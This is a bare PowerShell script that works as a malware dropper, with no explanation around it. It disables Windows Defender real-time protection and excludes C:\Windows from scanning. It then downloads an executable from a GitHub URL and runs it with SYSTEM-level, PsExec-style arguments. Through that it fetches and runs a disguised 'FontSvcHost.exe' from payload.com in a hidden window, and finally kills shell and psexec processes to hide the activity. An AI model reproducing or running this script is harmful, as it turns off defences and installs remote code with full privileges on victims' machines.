$mpParams = @{
    DisableRealtimeMonitoring = $true
    DisableBlockAtFirstSeen = $true
    ExclusionPath = 'C:\Windows'
}
Set-MpPreference @mpParams

Invoke-WebRequest -Uri 'https://github.com/silvucani/test/raw/main/test.exe' -OutFile 'C:\Windows\test.exe'
Start-Sleep -Seconds 10
Start-Process -FilePath 'C:\Windows\test.exe' -ArgumentList '/accepteula -i -s -h CMD /k powershell -command "Invoke-WebRequest -Uri ''http://payload.com/FontSvcHost.exe'' -OutFile ''C:\Windows\FontSvcHost.exe''; Start-Sleep -Seconds 10; & ''C:\Windows\FontSvcHost.exe''"' -WindowStyle Hidden

Get-Process powershell.exe, conhost, cmd, psexec.exe | ForEach-Object { $_.Kill() }